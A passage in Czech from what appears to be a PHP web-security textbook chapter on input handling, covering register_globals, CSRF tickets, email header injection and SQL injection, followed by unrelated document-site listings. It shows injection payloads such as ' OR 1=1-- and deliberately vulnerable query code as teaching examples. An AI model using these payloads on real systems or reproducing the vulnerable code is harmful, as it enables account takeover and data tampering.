17 Vstupy 5 Vstupy Jsou nejkritičtějším místem aplikace. Špatně ošetřené vstupy mohou dovolit útočníkovi aplikaci ovládnout a zneužít. Jako vstup můžeme označit jakákoliv data přicházející od klienta (tedy z prohlížeče) na server. Jsou to především parametry URI 8 a obsahy formulářů (nejen text, ale i soubory). Zároveň do vstupů zahrneme i obsahy cookies, sessions a hlavičky. V PHP jsou dvě možnosti, jak taková data přečíst a zpracovat: Přímo, pokud je direktiva register_globals serveru nastavena na on. Přes globální pole $_REQUEST, které sdružuje obsah $_POST, $_GET a $_COOKIE proměnných (do PHP verze i $_FILES) [4]. Přes jednotlivá $_POST, $_GET, $_COOKIE nebo $_SESSION. Pole $_REQUEST se v základním nastavení (dá se změnit pomocí variables_order v php.ini) zpracovává v tomto pořadí: GET, POST, COOKIE. Z toho plyne, že pokud útočník doplní do adresního řádku parametr, který je uložen v relaci, může změnit jeho hodnotu pokud používáme k přístupu k těmto informacím globálního pole $_REQUEST. Register_globals je od PHP verze z důvodu bezpečnosti automaticky nastaveno na off. To ovšem nezabraňuje jeho aktivaci (přes.htaccess) a použití pohodlnými programátory. Mějme tento ukázkový PHP kód [skript globals.php]: session_start(); $_COOKIE[name] = "Uživatel"; $_COOKIE[level] = "1"; echo "COOKIE: $_COOKIE[level]<br />"; echo "GET: $_GET[level]<br />"; if ($level == 3) echo "Admin"; else echo "User"; Jestliže ho spustíme tak, jak je, vypíše se User. To je v pořádku. Jakmile ale pozměníme URL takto: globals.php?level=3, bude na obrazovce svítit Admin, protože $_GET má větší prioritu než $_COOKIE. Obr. 11 Nastavení oprávnění pomocí register_globals Důležité pravidlo z toho plynoucí zní: Používat pro POST, GET, COOKIE a SESSION požadavky jejich superglobální proměnné. Mnoho programátorů žije falešným pocitem bezpečí, když schovávají řídící vstupy ve formulářích a spoléhají na to, že co uživatel nevidí, to nezmění. Tento přístup je chybný a nesmí se opomenout kontrolovat vše. A co tedy hlídat? Datový typ. Očekáváme-li číslo, musí nám číslo přijít. Přesvědčit se můžeme podmínkou a funkcí is_int(), nebo rovnou nastavit funkcí intval() (případně settype()). 8 Uniform Resource Identifier identifikátor zdroje - v našem případě stránky. Sbíráme z něj parametry metodou GET (např. 17

18 Vstupy Předávací metodu. Data z formulářů se nacházejí v poli $_POST (případně $_GET), soubory jsou ve $_FILES, data relace v $_SESSION atd Nepovolené znaky. Každý podsystém má sadu znaků, které pro něj mají větší význam než znaky ostatní. V MySQL to jsou například uvozovky. Nejjistější je tyto znaky odstranit (escapovat) a to nejlépe přímo funkcí pro podsystém určenou. Tolik obecně a nyní z hlediska funkčnosti a zpracování rozdělíme vstupy do dvou skupin: 5.1 Vstupy do subsystémů Nejprve se podíváme na techniky útoků využívající vstupy do podsystémů. Subsystémy představují v naší aplikaci databáze MySQL, textové soubory a souborový systém serveru (pro uploadované uživatelské soubory). Naprostým základem je používat pro požadavky měnící něco v subsystému (databázi) metodu POST. Prohlížeče totiž musí požádat uživatele o svolení, než provedou takovou akci znovu při stisknutí tlačítka Zpět (Opera je výjimkou - načítá z cache, takže se akce neprovedou). Zároveň se tato data neukládají do historie a nejsou tedy dál přístupná Lístkový systém Aby se zajistilo, že požadavek bude mít k dispozici opravdu jen uživatel, který jej vyžádal (tedy že se např. nejedná o podvrhnutý formulář), používá se tzv. ticketový (lístkový) systém. Server vygeneruje každé akci na stránce náhodný řetězec, který uloží do pole lístků v relaci uživatele. Zároveň ho pošle ve skrytém poli klientovi. Ten provede akci, lístek se odešle na server, porovná se s uloženým v relaci a pokud souhlasí, operace je provedena a lístek vymazán. Útočník nemůže vygenerované číslo napodobit a tím pádem ani vytvořit stejný formulář. <input type= hidden name= ticket value= edit /> print_r($_session['tickets']); -> Array ( [0] => edit ) Samozřejmě zůstane mnoho lístků nevyužitých. Ty je třeba mazat buď hned, nebo po dosažení určitého počtu odstranit několik prvních (nejstarších). Výhodou tohoto postupu navíc je, že není třeba hlídat opakované požadavky (třeba opětovné odeslání POST při obnovení stránky). Nevýhodami jsou zátěž na server při větším množství požadavků a možné vypršení času relace. Stránky omezené lístky by se také neměly ukládat do cache - tím se zaručí, že při každém zobrazení budou k dispozici platné lístky (stránka se načte znovu) ový formulář ové formuláře se používají, když chce dát autor stránek návštěvníkům možnost ho kontaktovat, ale zároveň nechce uvádět svou adresu, jako funkce odeslání odkazu na článek známému apod... Uživatel pak vyplní nabídnutá pole a odešle. V PHP se pak formulář jednoduše zpracuje funkcí mail(). 18

19 Vstupy Obr. 12 Kontaktní formulář BlueForm od BlueBoard.cz [21] uvádí tato doporučení: dovolujeme-li uživateli vyplnit adresu příjemce, měla by být určitá část zprávy pevná a je vhodné omezit její délku, aby nebyl formulář zneužitelný např. k hromadnému rozesílání nevyžádané pošty nebo vytěžování serverů není-li adresa příjemce vyplňována (třeba u kontaktního formuláře), neměla by být skryta ve formuláři, ale pracovat by se s ní mělo až na serveru má-li skript rozesílat různé formuláře na různé adresy, je dobré v aplikaci definovat seznam dovolených adres (pevně v poli nebo třeba uložením do databáze...) a do skrytého pole formuláře pak jen umisťovat jejich ID je nutno pečlivě kontrolovat údaje, které se následně použijí v hlavičce From nebo Reply-To ová zpráva je tvořena sadou hlaviček oddělenou od textu zprávy prázdným řádkem. Jednotlivé hlavičky dle normy [29] musí být odděleny znaky CR a LF (tedy \r a \n). Některé unixové systémy nahrazují \n automaticky za \r\n. Příklad útoku od [21]: Když útočník zadá do pole pro adresu například toto: adresa\ncc: adresa,...\n\nnová zpráva a my v kódu tvoříme tímto způsobem: mail( Komu, Predmet, Zprava, Reply-To: $_POST[from] ), vytvoří se následující zpráva: To: Komu Subject: Predmet Reply-To: adresa Cc: adresa,... Nová zpráva Původní zpráva Změní se tak celé znění textu zprávy a navíc má útočník možnost zadat libovolné adresy, kterým se zašle kopie. Řešení je jednoduché - oříznout vstup uživatele za prvním koncem řádku. Dále by jednotlivé řádky zprávy neměly být delší než 70 znaků. Ošetření lze provést funkcí wordwrap($text, 70); SQL Injection Ve zkratce se tato technika dá popsat jako schopnost uživatele modifikovat SQL dotaz pomocí předaných parametrů. Stačí dostatečně neošetřit vstupy do MySQL a útok je dílem několika řádek. A rovnou ukázka - podívejme se na příklad kontroly přihlášení uživatele: mysql_query("select * FROM users WHERE login = '$_POST[login]' AND pass = SHA1($_POST[pass])"); Dynamicky se tu skládá dotaz na databázi a všimněte si, že $_POST proměnné nejsou před předáním dotazu nijak upraveny. Stačí tedy, aby uživatel zadal do pole login takovýto text: 19

20 Vstupy ' OR 1=1-- Databáze pak dostane modifikovaný dotaz: SELECT * FROM users WHERE login = '' OR 1=1-- ' AND pass = SHA1($_POST[pass]) MySQL parser pak uvidí konec řetězce následovaný logickou podmínkou, která je vždy splněna (1=1) a znaky -- způsobující, že vše další je bráno jako komentář, takže ověření hesla úplně vypustí. Takto modifikovaný dotaz pak například vybere prvního v databázi (podle toho, jak je skriptem zpracován). Obr. 13 SQL Injection v praxi Obr. 14 Výsledek úspěšného útoku Toto je nejjednodušší možnost napadení aplikace - získání přístupu k jakémukoliv účtu (včetně administrátorských, které i většinou bývají v tabulce jako první). Dále je možné získat přístup k citlivým datům uživatelů (hesla, profily...), modifikovat (i smazat) tabulky nebo se vydávat za někoho jiného. Možnosti ukazuje [30]. Nebezpečím jsou také číselné hodnoty neuzavřené v apostrofech. Mějme tento skládaný dotaz: UPDATE gbook SET... WHERE id = $_POST[id] Útočník změní ve formuláři id na 5 OR 1=1--. Provedený dotaz bude mít tvar: UPDATE gbook SET... WHERE id = 5 OR 1=1-- Jak asi tušíte, nezmění se jen záznam číslo 5, ale spolu s ním i všechny ostatní. Zde nepomůže pouze odstraňování nebezpečných znaků. Čeho se není třeba obávat: PHP funkce mysql_query() nepodporuje vykonávání více dotazů za sebou (oddělených středníkem) a provádění je ukončeno po prvním ;. Není proto třeba řešit problém se vstupem typu '; DELETE FROM... Stále však existuje příkaz UNION. MySQL narozdíl od MSSQL neumí zavolat externí aplikaci ani systémový příkaz. K rozsáhlejšímu útoku na databázi je třeba mít přehled o její struktuře. Ohromným zdrojem informací jsou chybová hlášení. Jsou-li příliš podrobná, není problém několika pokusy zjistit strukturu tabulky a dál s ní pracovat. Není proto od věci omezit výpis chyb nastavením PHP, případně vlastní funkcí zjistit aktivitu jakéhosi debug módu (třeba testováním, že IP adresa je localhost), v kterém ladíme skripty a je proto žádoucí vědět, kde se přesně stala jaká chyba. Vypisovat znění celého dotazu při chybě je výborná pomůcka pro ladění, ale zároveň neocenitelná mapa struktury tabulky. Několika pokusy se tak dá zjistit rozsah databáze. Ochrana Zaručenou obranou proti SQL Injection je upravování všech vstupů, které putují do databáze. Toto by se mělo dít až na straně serveru (tedy zpracujícím PHP skriptem). Ověřování 20

Šifrování Autentizace Bezpečnostní slabiny. Bezpečnost. Lenka Kosková Třísková, NTI TUL. 22. března 2013

Šifrování Autentizace Bezpečnostní slabiny. Bezpečnost. Lenka Kosková Třísková, NTI TUL. 22. března 2013 Šifrování Autentizace ní slabiny 22. března 2013 Šifrování Autentizace ní slabiny Technologie Symetrické vs. asymetrické šifry (dnes kombinace) HTTPS Funguje nad HTTP Šifrování s pomocí SSL nebo TLS Šifrování

Více

Testování webových aplikací Seznam.cz

Testování webových aplikací Seznam.cz Testování webových aplikací Seznam.cz Roman Kümmel Bezpečnostní hrozby Síťové prvky, servery VPN, Remote desktop Webové aplikace DoS, DDoS Sociotechnika Wi-Fi Útoky proti uživatelům Útoky proti aplikaci

Více

Třídy a objekty. Třídy a objekty. Vytvoření instance třídy. Přístup k atributům a metodám objektu. $z = new Zlomek(3, 5);

Třídy a objekty. Třídy a objekty. Vytvoření instance třídy. Přístup k atributům a metodám objektu. $z = new Zlomek(3, 5); Programovací jazyk PHP doc. Ing. Miroslav Beneš, Ph.D. katedra informatiky FEI VŠB-TUO A-1007 / 597 324 213 http://www.cs.vsb.cz/benes Miroslav.Benes@vsb.cz Obsah Třídy a objekty Výjimky Webové aplikace

Více

K práci je možné přistoupit následujícím způsobem. Odkaz na práci se nachází na osobním webu autora práce: http://stpr.cz/.

K práci je možné přistoupit následujícím způsobem. Odkaz na práci se nachází na osobním webu autora práce: http://stpr.cz/. 2. Seznámení K práci je možné přistoupit následujícím způsobem. Odkaz na práci se nachází na osobním webu autora práce: http://stpr.cz/. 2.1. Uživatel (učitel) Uživatelem (učitelem) se myslí osoba, která

Více

Manuál pro žadatele OBSAH

Manuál pro žadatele OBSAH Manuál pro žadatele OBSAH 1. Úvod... 2 2. Registrace žadatele do systému... 3 3. Přihlášení... 5 4. Změna hesla... 6 5. Obnova zapomenutého hesla... 7 6. Vyplňování formuláře žádosti o dotaci... 8 6.1.

Více

Vstupní požadavky, doporučení a metodické pokyny

Vstupní požadavky, doporučení a metodické pokyny Název modulu: Základy PHP Označení: C9 Stručná charakteristika modulu Modul je orientován na tvorbu dynamických stánek aktualizovaných podle kontextu volání. Jazyk PHP umožňuje velmi jednoduchým způsobem

Více

Už ivatelska dokumentace

Už ivatelska dokumentace Už ivatelska dokumentace Aplikace Portál úspěšných projektů je určena k publikování informací o projektech realizovaných za přispění některého z Operačních programů v gesci Ministerstva vnitra České republiky.

Více

PHP PHP je skriptovací programovací jazyk dynamických internetových stránek PHP je nezávislý na platformě

PHP PHP je skriptovací programovací jazyk dynamických internetových stránek PHP je nezávislý na platformě PHP PHP původně znamenalo Personal Home Page a vzniklo v roce 1996, od té doby prošlo velkými změnami a nyní tato zkratka znamená Hypertext Preprocessor. PHP je skriptovací programovací jazyk, určený především

Více

POKYNY K REGISTRACI PROFILU ZADAVATELE

POKYNY K REGISTRACI PROFILU ZADAVATELE POKYNY K REGISTRACI PROFILU ZADAVATELE Stav ke dni 4. 12. 2012 Obsah: 1 Úvod... 3 1.1 Podmínky provozu... 3 1.2 Pokyny k užívání dokumentu... 3 2 Registrace profilu zadavatele... 4 2.1 Přihlášení uživatele...

Více

Manuál k elektronickému podávání přihlášek a žádostí u ÚPV

Manuál k elektronickému podávání přihlášek a žádostí u ÚPV Manuál k elektronickému podávání přihlášek a žádostí u ÚPV Úvod Elektronické podávání nabízí uživatelům kvalitní a bezpečnou formu komunikace s Úřadem při současné úspoře finančních nákladů a času. Je

Více

Pracovní výkazy. návod k použití. Internetová aplikace Pracovní výkazy slouží k zadávání pracovních výkazů od zaměstnanců a externích pracovníků.

Pracovní výkazy. návod k použití. Internetová aplikace Pracovní výkazy slouží k zadávání pracovních výkazů od zaměstnanců a externích pracovníků. 1 Popis aplikace Pracovní výkazy návod k použití Internetová aplikace Pracovní výkazy slouží k zadávání pracovních výkazů od zaměstnanců a externích pracovníků. 2 Technické požadavky klienta Internetový

Více

Stručný průvodce aplikací Sběr dat pro CEP a CEZ

Stručný průvodce aplikací Sběr dat pro CEP a CEZ Stručný průvodce aplikací Sběr dat pro CEP a CEZ (verze 1.0) Rada pro výzkum a vývoj Úřad vlády ČR Určeno necertifikovanému dodavateli dat RVV 2003 1. Vstup do aplikace Informace pro uživatele, uživatelské

Více

Uživatelský manuál aplikace. Dental MAXweb

Uživatelský manuál aplikace. Dental MAXweb Uživatelský manuál aplikace Dental MAXweb Obsah Obsah... 2 1. Základní operace... 3 1.1. Přihlášení do aplikace... 3 1.2. Odhlášení z aplikace... 3 1.3. Náhled aplikace v jiné úrovni... 3 1.4. Změna barevné

Více

SSL Secure Sockets Layer

SSL Secure Sockets Layer SSL Secure Sockets Layer internetové aplikační protokoly jsou nezabezpečené SSL vkládá do architektury šifrující vrstvu aplikační (HTTP, IMAP,...) SSL transportní (TCP, UDP) síťová (IP) SSL poskytuje zabezpečenou

Více

PROFI TDi s.r.o. 696 37, Želetice 40 www.profi-tdi.cz info@profi-tdi.cz. Návod k používání systému OTDI.CZ

PROFI TDi s.r.o. 696 37, Želetice 40 www.profi-tdi.cz info@profi-tdi.cz. Návod k používání systému OTDI.CZ Návod k používání systému OTDI.CZ Vážený kliente. Děkujeme za projevený zájem o náš on-line systém evidence kontrol, určený speciálně pro účely dozorů staveb. Systém OTDI.CZ nabízí svým uživatelům zejména:

Více

Informační systém pro e-learning manuál

Informační systém pro e-learning manuál Informační systém pro e-learning manuál Verze 1.00 Úvod Tento dokument popisuje způsob práce s informačním systémem pro elektronické vzdělávání. Systém je určený pro vytvoření elektronického kurzu a jeho

Více

Manuál pro studenty. Obsah

Manuál pro studenty. Obsah Manuál pro studenty Studovat můžete v čase, který Vám vyhovuje a z jakéhokoliv prostředí. Náklady na cestovné a ubytování tímto ušetříte! Kurz Vás nebude nic stát! Počet kurzů bude záviset jen na Vás.

Více

Manuál pro správu uživatelských účtů aplikace MoneyWeb

Manuál pro správu uživatelských účtů aplikace MoneyWeb Manuál pro správu uživatelských účtů aplikace MoneyWeb Poznámka: Tento manuál byl vytvořen za použití Microsoft Internet Exploreru verze 6 cs. Používáte-li jinou verzi MS Internet Exploreru nebo jiný prohlížeč

Více

Provozní dokumentace. Seznam orgánů veřejné moci. Příručka pro běžného uživatele

Provozní dokumentace. Seznam orgánů veřejné moci. Příručka pro běžného uživatele Provozní dokumentace Seznam orgánů veřejné moci Příručka pro běžného uživatele Vytvořeno dne: 7. 7. 2011 Aktualizováno: 11. 2. 2015 Verze: 2.2 2015 MVČR Obsah Příručka pro běžného uživatele 1 Úvod...3

Více

17. července 2005 15:51 z moravec@yahoo.com http://www.z-moravec.net/

17. července 2005 15:51 z moravec@yahoo.com http://www.z-moravec.net/ 17. července 2005 15:51 z moravec@yahoo.com http://www.z-moravec.net/ Úvod 1 Úvod Nedávno jsem zveřejnil návod na vytvoření návštěvní knihy bez nutnosti použít databázi. To je výhodné tehdy, kdy na serveru

Více

STŘEDNÍ ŠKOLA INFORMAČNÍCH TECHNOLOGIÍ A SOCIÁLNÍ PÉČE

STŘEDNÍ ŠKOLA INFORMAČNÍCH TECHNOLOGIÍ A SOCIÁLNÍ PÉČE STŘEDNÍ ŠKOLA INFORMAČNÍCH TECHNOLOGIÍ A SOCIÁLNÍ PÉČE WEBOWÉ STRÁNKY TŘÍD KAMIL POPELKA ZÁVĚREČNÁ MATURITNÍ PRÁCE BRNO 2011 Prohlášení Prohlašuji, že maturitní práce je mým původním autorským dílem, které

Více

Elektronický podpis. Základní princip. Digitální podpis. Podpis vs. šifrování. Hashování. Jednosměrné funkce. Odesílatel. Příjemce

Elektronický podpis. Základní princip. Digitální podpis. Podpis vs. šifrování. Hashování. Jednosměrné funkce. Odesílatel. Příjemce Základní princip Elektronický podpis Odesílatel podepíše otevřený text vznikne digitálně podepsaný text Příjemce ověří zda podpis patří odesílateli uvěří v pravost podpisu ověří zda podpis a text k sobě

Více

Maturitní projekt do IVT Pavel Doleček

Maturitní projekt do IVT Pavel Doleček Maturitní projekt do IVT Pavel Doleček CO FILMBOOK JE Filmbook je uzavřená webová aplikace pro celkovou správu informací a dat souvisejících se sledováním filmů. Primárně je zaměřen na uchovávání a spravování

Více

Freemail Prahy 10. Do svého e-mailu se můžete přihlásit odkudkoliv na webové adrese

Freemail Prahy 10. Do svého e-mailu se můžete přihlásit odkudkoliv na webové adrese Freemail Prahy 10 Co umožňuje Freemail Freemail funguje na podobném principu jako běžné e-maily (seznam.cz, centrum.cz apod.). Abyste se lépe ve svém e-mailu orientovali, připravili jsme pro vás jednoduchý

Více

Dokumentace ke službě SMS Connect. www.smsbrana.cz

Dokumentace ke službě SMS Connect. www.smsbrana.cz Dokumentace ke službě SMS Connect www.smsbrana.cz Obsah 1 ZÁKLADNÍ INFORMACE... 3 1.1 Aktivace služby SMS Connect... 3 1.2 Přístupové údaje... 3 1.3 Přístupový bod služby URL adresa pro SMS Connect...

Více

Databázové aplikace pro internetové prostředí. 01 - PHP úvod, základní princip, vkládání skriptu, komentáře, výpis na obrazovku

Databázové aplikace pro internetové prostředí. 01 - PHP úvod, základní princip, vkládání skriptu, komentáře, výpis na obrazovku Databázové aplikace pro internetové prostředí 01 - PHP úvod, základní princip, vkládání skriptu, komentáře, výpis na obrazovku Projekt: Inovace výuky prostřednictvím ICT Registrační číslo: CZ.1.07/1.5.00/34.250

Více

Práce s e-mailovými schránkami v síti Selfnet

Práce s e-mailovými schránkami v síti Selfnet Práce s e-mailovými schránkami v síti Selfnet Obsah návodu Základní informace k nastavení schránky selfnet.cz...2 Doporučené parametry nastavení e-mailového klienta...2 Základní informace k nastavení e-mailové

Více

Úvod...1 Instalace...1 Popis funkcí...2 Hlavní obrazovka...2 Menu...3 Práce s aplikací - příklad...5

Úvod...1 Instalace...1 Popis funkcí...2 Hlavní obrazovka...2 Menu...3 Práce s aplikací - příklad...5 Rejstřík Úvod...1 Instalace...1 Popis funkcí...2 Hlavní obrazovka...2 Menu...3 Práce s aplikací - příklad...5 Úvod Správcovská aplikace slouží k vytvoření vstupního a zašifrovaného souboru pro odečtovou

Více

Stručný průvodce aplikací Sběr dat pro RIV

Stručný průvodce aplikací Sběr dat pro RIV Stručný průvodce aplikací Sběr dat pro RIV (verze 1.0) Rada pro výzkum a vývoj Úřad vlády ČR Určeno necertifikovanému dodavateli dat RVV 2003 1. Vstup do aplikace Informace pro uživatele, uživatelské příručky

Více

Postup nastavení bezpečné E-mailové schránky pro zákazníky Logicentra

Postup nastavení bezpečné E-mailové schránky pro zákazníky Logicentra Postup nastavení bezpečné E-mailové schránky pro zákazníky Logicentra Důvod přidělování speciálních schránek. Podle posledních statistik kolem 90 % všech E-mailů na Internetu tvoří nevyžádaná pošta. Patří

Více

Národní elektronický nástroj. Import profilu zadavatele do NEN

Národní elektronický nástroj. Import profilu zadavatele do NEN Národní elektronický nástroj Import profilu zadavatele do NEN V 1.2 2014 Obsah 1 Cíl...... 2 2 Nutné podmínky k umožnění importu profilu zadavatele...... 2 3 Povinnosti zadavatele dle metodiky k vyhlášce

Více

Groupwise PŘÍSTUP A NASTAVENÍ E-MAILOVÉ SCHÁNKY PŘES WEBOVÉ ROZHRANÍ

Groupwise PŘÍSTUP A NASTAVENÍ E-MAILOVÉ SCHÁNKY PŘES WEBOVÉ ROZHRANÍ Groupwise PŘÍSTUP A NASTAVENÍ E-MAILOVÉ SCHÁNKY PŘES WEBOVÉ ROZHRANÍ Obsah 1. Přístup přes webové rozhraní... 1 2. Možnosti nastavení schránky... 1 2.1. Změna hesla... 1 2.2. Pravidla... 2 2.3. Podpis...

Více

Návod na instalaci HW certifikátu aplikace PARTNER24

Návod na instalaci HW certifikátu aplikace PARTNER24 Návod na instalaci HW certifikátu aplikace PARTNER24 Verze: 2.13 (19. 8. 2015) Vlastník: CEN7350_03 Jméno souboru: P24_manual_certifikat_hw Obsah Návod na instalaci HW certifikátu aplikace PARTNER24...

Více

1 Administrace systému 3. 1.3 Moduly... 3 1.4 Skupiny atributů... 4 1.5 Atributy... 4 1.6 Hodnoty atributů... 4

1 Administrace systému 3. 1.3 Moduly... 3 1.4 Skupiny atributů... 4 1.5 Atributy... 4 1.6 Hodnoty atributů... 4 CRM SYSTÉM KORMORÁN PŘÍRUČKA ADMINISTRÁTORA Obsah 1 Administrace systému 3 1.1 Uživatelské účty.................................. 3 1.2 Přístupová práva................................. 3 1.3 Moduly.......................................

Více

Registrační číslo projektu: CZ.1.07/1.5.00/34.0553 Elektronická podpora zkvalitnění výuky CZ.1.07 Vzděláním pro konkurenceschopnost

Registrační číslo projektu: CZ.1.07/1.5.00/34.0553 Elektronická podpora zkvalitnění výuky CZ.1.07 Vzděláním pro konkurenceschopnost Registrační číslo projektu: CZ.1.07/1.5.00/34.0553 Elektronická podpora zkvalitnění výuky CZ.1.07 Vzděláním pro konkurenceschopnost Projekt je realizován v rámci Operačního programu Vzdělávání pro konkurence

Více

Hitparáda webhackingu nestárnoucí hity. Roman Kümmel

Hitparáda webhackingu nestárnoucí hity. Roman Kümmel Hitparáda webhackingu nestárnoucí hity Roman Kümmel Bezpečnostní hrozby Síťové prvky, servery VPN, Remote desktop Webové aplikace DoS, DDoS Sociotechnika Wi-Fi Útoky proti uživatelům Útoky proti aplikaci

Více

Uživatelská příručka pro. elektronické podání žádosti o uznání porostů. přístup k výsledkům přehlídek uznávacího řízení

Uživatelská příručka pro. elektronické podání žádosti o uznání porostů. přístup k výsledkům přehlídek uznávacího řízení Uživatelská příručka pro elektronické podání žádosti o uznání porostů a přístup k výsledkům přehlídek uznávacího řízení prostřednictvím Portálu farmáře verze: 1.0 Strana 1 (celkem 14) Vytvořeno dne 3.1.2011

Více

BRICSCAD V15. Licencování

BRICSCAD V15. Licencování BRICSCAD V15 Licencování Protea spol. s r.o. Makovského 1339/16 236 00 Praha 6 - Řepy tel.: 235 316 232, 235 316 237 fax: 235 316 038 e-mail: obchod@protea.cz web: www.protea.cz Copyright Protea spol.

Více

Uživatel počítačové sítě

Uživatel počítačové sítě Uživatel počítačové sítě Intenzivní kurz CBA Daniel Klimeš, Ivo Šnábl Program kurzu Úterý 8.3.2005 15.00 18.00 Teoretická část Středa 9.3.2005 15.00 19.00 Praktická práce s počítačem Úterý 15.3.2005 15.00

Více

Uživatelská dokumentace

Uživatelská dokumentace Uživatelská dokumentace Verze 14-06 2010 Stahování DTMM (v rámci služby Geodata Distribution) OBSAH OBSAH...2 1. O MAPOVÉM SERVERU...3 2. NASTAVENÍ PROSTŘEDÍ...3 2.1 Hardwarové požadavky...3 2.2 Softwarové

Více

Max Homebanking PS uživatelský manuál rozhraní pro automatické stahování dat

Max Homebanking PS uživatelský manuál rozhraní pro automatické stahování dat Max Homebanking PS uživatelský manuál rozhraní pro automatické stahování dat Obsah 1 Úvod... 2 2 Nastavení přístupů k rozhraní... 2 2.1 Popis obrazovky... 2 2.1.1 Nastavení datových extraktů z banky...

Více

Postup získání certifikátu pro uživatele WEB aplikací určených pro Sběry dat pro IS VaV

Postup získání certifikátu pro uživatele WEB aplikací určených pro Sběry dat pro IS VaV Postup získání certifikátu pro uživatele WEB aplikací určených pro Sběry dat pro IS VaV verze 1.2 Praha 18.12.2002 Obsah WEB aplikace určené pro sběry dat do CEP, CEZ a RIV plně podporují práci s certifikáty.

Více

Aplikace objednávání svozů

Aplikace objednávání svozů GE MONEY Aplikace objednávání svozů Uživatelská dokumentace IMP spol. s r.o. 14.1.2011 Uživatelská dokumentace k systému pro objednávání a evidenci svozů z poboček GE Money. 1 Přihlášení do aplikace K

Více

ipodatelna Uživatelská příručka

ipodatelna Uživatelská příručka Uživatelská příručka 1 Obsah Obsah 1 I Úvod 2 II Práce s aplikací 3 III Podání 4 1 Nové podání... 5 IV Informace o Uživateli 11 V Podatelna 13 1 Přijmout... a odmítnout podání 13 2 Seznam... došlých podání

Více

Technologické postupy práce s aktovkou IS MPP

Technologické postupy práce s aktovkou IS MPP Technologické postupy práce s aktovkou IS MPP Modul plánování a přezkoumávání, verze 1.20 vypracovala společnost ASD Software, s.r.o. dokument ze dne 27. 3. 2013, verze 1.01 Technologické postupy práce

Více

Současný svět Projekt č. CZ.2.17/3.1.00/32038, podpořený Evropským sociálním fondem v rámci Operačního programu Praha adaptabilita

Současný svět Projekt č. CZ.2.17/3.1.00/32038, podpořený Evropským sociálním fondem v rámci Operačního programu Praha adaptabilita Aktivní webové stránky Úvod: - statické webové stránky: pevně vytvořený kód HTML uložený na serveru, ke kterému se přistupuje obvykle pomocí protokolu HTTP (HTTPS - zabezpečený). Je možno používat i různé

Více

Střední odborná škola a Střední odborné učiliště, Hořovice

Střední odborná škola a Střední odborné učiliště, Hořovice Kód DUM : VY_32_INOVACE_DYN.1.19 Název materiálu: 19 PHP- Základy práce s databází PHP 2. část MySQL (Aplikace knihovna) Anotace Autor Jazyk Očekávaný výstup DUM je žákům průvodcem vytvoření databáze knih

Více

Registr práv a povinností

Registr práv a povinností Registr práv a povinností Doporučené postupy a nastavení internetového prohlížeče pro práci v aplikaci AIS RPP Doporučené postupy a nastavení internetového prohlížeče pro práci v aplikaci AIS RPP v4.0

Více

UŽIVATELSKÝ MANUÁL PERSONALIZACE MOJE SODEXO V.3 2009-11-08

UŽIVATELSKÝ MANUÁL PERSONALIZACE MOJE SODEXO V.3 2009-11-08 UŽIVATELSKÝ MANUÁL PERSONALIZACE MOJE SODEXO V.3 2009-11-08 1 Obsah dokumentu 1 Obsah dokumentu... 2 2 Personalizovaná objednávka... 3 3 Jednoduchá... 3 4 Standardní... 4 5 Komplexní... 5 5.1 Párování

Více

Nástrojová lišta v editačním poli

Nástrojová lišta v editačním poli Nástrojová lišta v editačním poli Název projektu PŘEJÍT NA konkrétní sekci webu ZOBRAZIT zobrazí a) pracovní verzi webu (tj. nepublikovanou) b) publikovanou verzi webu a) Odstranit odstraní zobrazenou

Více

V zelené liště vpravo nahoře pod nabídkou Informace naleznete vzory formulářů výkazů, pokyny a vysvětlivky k jejich vyplnění a další informace.

V zelené liště vpravo nahoře pod nabídkou Informace naleznete vzory formulářů výkazů, pokyny a vysvětlivky k jejich vyplnění a další informace. Práce s aplikací pro zpracování statistických výkazů za vysoké školy a ostatní přímo řízené organizace (netýká se škol a školských zařízení v regionálním školství) 1. Postup: Přihlásíte se k internetu

Více

Pomůcka/manuál pro redakční systém http://helpdesk.remax-czech.cz verze 1.0

Pomůcka/manuál pro redakční systém http://helpdesk.remax-czech.cz verze 1.0 Pomůcka/manuál pro redakční systém http://helpdesk.remax-czech.cz verze 1.0 Přihlášení do systému Na adrese http://helpdesk.remax-czech.cz, viz. obr., vyplněním příslušného uživatelského jména a hesla.

Více

Formátování pomocí stylů

Formátování pomocí stylů Styly a šablony Styly, šablony a témata Formátování dokumentu pomocí standardních nástrojů (přímé formátování) (Podokno úloh Zobrazit formátování): textu jsou přiřazeny parametry (font, velikost, barva,

Více

PHP tutoriál (základy PHP snadno a rychle)

PHP tutoriál (základy PHP snadno a rychle) PHP tutoriál (základy PHP snadno a rychle) Druhá, vylepšená offline verze. Připravil Štěpán Mátl, http://khamos.wz.cz Chceš se naučit základy PHP? V tom případě si prostuduj tento rychlý průvodce. Nejdříve

Více

www.dpd.cz/dobirky Uživatelský manuál

www.dpd.cz/dobirky Uživatelský manuál www.dpd.cz/dobirky Uživatelský manuál DPD CZ Obsah 1. Úvod... 3 2. Přihlášení... 3 Přihlášení... 3 Nový uživatel, zapomenuté heslo... 5 3. Nastavení... 6 Nastavení uživatele... 6 Nastavení bankovních účtů...

Více

FIO API PLUS. Verze 1.1.1

FIO API PLUS. Verze 1.1.1 FIO API PLUS Verze 1.1.1 www.fio.cz Verze 29. 5. 2015 OBSAH: 1 FUNKČNÍ POPIS... 2 2 INSTALACE APLIKACE... 2 3 ZÍSKÁNÍ TOKENU... 2 4 PŘIDÁNÍ ÚČTU / TOKENU DO APLIKACE... 3 5 STAŽENÍ DAT... 3 Periodické

Více

Základní uživatelský manuál služby WMS Drive

Základní uživatelský manuál služby WMS Drive Základní uživatelský manuál služby WMS Drive Uživatelský manuál Obsah Uživatelský manuál Obsah 2 Webový klient Základní prostředí 3 Webový klient Oblíbené položky 4 Webový klient Upload souborů 5 Webový

Více

SMTPServer - Příručka

SMTPServer - Příručka Obsah Požadavky na systém... 2 Použití... 2 Proč vlastní SMTPServer... 2 Koncepce tohoto SMTPServeru... 2 Instalace SMTPServeru... 2 Odinstalování SMTPServeru... 6 Jak tento SMTPServer pracuje... 7 Stavy

Více

Uživatelská příručka

Uživatelská příručka B2B CENTRUM a.s. 3.2011 Obsah Začínáme... 3 Přihlášení a zapomenuté heslo... 3 Vytvoření uživatele... 3 Editace osobních údajů... 5 Vkládání souborů... 6 Elektronický podpis... 8 Stavební deník... 11 Identifikační

Více

Technická specifikace Platební brána IBS

Technická specifikace Platební brána IBS Technická specifikace Platební brána IBS Verze 1 Strana 1 z 6 1. Obecné Platební brána je určena k platbě za zboží nebo služby nakoupené v internetovém obchodě, kdy uživatel je přesměrován na přihlašovací

Více

